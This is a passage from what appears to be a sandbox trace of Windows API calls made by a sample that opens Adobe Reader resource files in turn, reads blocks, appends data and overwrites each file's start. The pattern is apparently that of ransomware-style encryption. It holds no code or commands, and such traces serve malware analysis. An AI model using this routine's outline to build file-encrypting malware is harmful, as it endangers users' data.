lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0099.614] CloseHandle (hObject=0x1f0) returned 1 [0099.614] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ko.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ko.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0099.615] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0099.615] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x626a [0099.615] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0099.615] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0099.616] ReleaseMutex (hMutex=0x168) returned 1 [0099.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ko.txt", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0099.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ko.txt", cchWideChar=27, lpMultiByteStr=0x1f8fd5c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.ko.txt", lpUsedDefaultChar=0x0) returned 27 [0099.616] ReadFile (in: hFile=0x1f0, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0099.617] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x526a [0099.617] ReadFile (in: hFile=0x1f0, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0099.618] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x526a [0099.618] WriteFile (in: hFile=0x1f0, lpBuffer=0x2865a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2865a88*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0099.619] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0099.619] WriteFile (in: hFile=0x1f0, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0099.619] CloseHandle (hObject=0x1f0) returned 1 [0099.619] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nl.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nl.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0099.620] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0099.620] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x6dc6 [0099.620] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0099.620] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0099.620] ReleaseMutex (hMutex=0x168) returned 1 [0099.620] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.nl.txt", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0099.620] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.nl.txt", cchWideChar=27, lpMultiByteStr=0x1f8fd5c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.nl.txt", lpUsedDefaultChar=0x0) returned 27 [0099.620] ReadFile (in: hFile=0x1f0, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0099.625] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x5dc6 [0099.625] ReadFile (in: hFile=0x1f0, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0099.626] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x5dc6 [0099.626] WriteFile (in: hFile=0x1f0, lpBuffer=0x2865a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2865a88*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0099.627] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0099.627] WriteFile (in: hFile=0x1f0, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0099.628] CloseHandle (hObject=0x1f0) returned 1 [0099.628] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.pt_BR.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.pt_br.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0099.629] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0099.629] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x6ebc [0099.629] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0099.629] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0099.629] ReleaseMutex (hMutex=0x168) returned 1 [0099.629] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.pt_BR.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0099.629] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.pt_BR.txt", cchWideChar=30, lpMultiByteStr=0x1f8fd5c, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.pt_BR.txt", lpUsedDefaultChar=0x0) returned 30 [0099.629] ReadFile (in: hFile=0x1f0, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0099.631] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x5ebc [0099.632] ReadFile (in: hFile=0x1f0, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0099.632] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x5ebc [0099.633] WriteFile (in: hFile=0x1f0, lpBuffer=0x2865a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2865a88*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0099.634] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0099.634] WriteFile (in: hFile=0x1f0, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0099.634] CloseHandle (hObject=0x1f0) returned 1 [0099.634] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sk.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.sk.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0099.635] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0099.636] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x6d76 [0099.636] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0099.636] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0099.636] ReleaseMutex (hMutex=0x168) returned 1 [0099.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.sk.txt", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0099.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.sk.txt", cchWideChar=27, lpMultiByteStr=0x1f8fd5c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.sk.txt", lpUsedDefaultChar=0x0) returned 27 [0099.636] ReadFile (in: hFile=0x1f0, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0099.638] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x5d76 [0099.639] ReadFile (in: hFile=0x1f0, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0099.640] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x5d76 [0099.640] WriteFile (in: hFile=0x1f0, lpBuffer=0x2865a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2865a88*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0099.641] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0099.641] WriteFile (in: hFile=0x1f0, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0099.641] CloseHandle (hObject=0x1f0) returned 1 [0099.641] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.tr_TR.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.tr_tr.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0099.642] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0099.642] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x7288 [0099.643] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0099.643] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0099.643] ReleaseMutex (hMutex=0x168) returned 1 [0099.643] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.tr_TR.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0099.643] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.tr_TR.txt", cchWideChar=30, lpMultiByteStr=0x1f8fd5c, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.tr_TR.txt", lpUsedDefaultChar=0x0) returned 30 [0099.643] ReadFile (in: hFile=0x1f0, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0099.645] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x6288 [0099.645] ReadFile (in: hFile=0x1f0, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0099.650] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x6288 [0099.651] WriteFile (in: hFile=0x1f0, lpBuffer=0x2865a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2865a88*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0099.651] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0099.651] WriteFile (in: hFile=0x1f0, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0099.651] CloseHandle (hObject=0x1f0) returned 1 [0099.651] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\araphon.env" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\araphon.env"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0114.020] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0114.025] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x3cf0 [0114.025] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0114.025] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.026] ReleaseMutex (hMutex=0x168) returned 1 [0114.026] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="araphon.env", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0114.026] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="araphon.env", cchWideChar=11, lpMultiByteStr=0x1f7320c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="araphon.env", lpUsedDefaultChar=0x0) returned 11 [0114.026] ReadFile (in: hFile=0x1f0, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0114.033] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x2cf0 [0114.034] ReadFile (in: hFile=0x1f0, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0114.035] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x2cf0 [0114.035] WriteFile (in: hFile=0x1f0, lpBuffer=0x288ade8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0114.036] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0114.036] WriteFile (in: hFile=0x1f0, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0114.036] CloseHandle (hObject=0x1f0) returned 1 [0114.036] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brz32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\brz32.clx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0114.037] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0114.037] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x7fc9 [0114.037] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0114.037] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.038] ReleaseMutex (hMutex=0x168) returned 1 [0114.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="brz32.clx", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0114.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="brz32.clx", cchWideChar=9, lpMultiByteStr=0x1f7356c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="brz32.clx", lpUsedDefaultChar=0x0) returned 9 [0114.038] ReadFile (in: hFile=0x1f0, lpBuffer=0x288ade8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0114.039] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x6fc9 [0114.039] ReadFile (in: hFile=0x1f0, lpBuffer=0x288ade8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0114.040] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x6fc9 [0114.040] WriteFile (in: hFile=0x1f0, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0114.041] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0114.041] WriteFile (in: hFile=0x1f0, lpBuffer=0x288ade8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0114.042] CloseHandle (hObject=0x1f0) returned 1 [0114.042] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\can03.ths" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\can03.ths"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0114.043] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0114.043] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xa1c00 [0114.043] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0114.043] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.043] ReleaseMutex (hMutex=0x168) returned 1 [0114.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="can03.ths", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0114.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="can03.ths", cchWideChar=9, 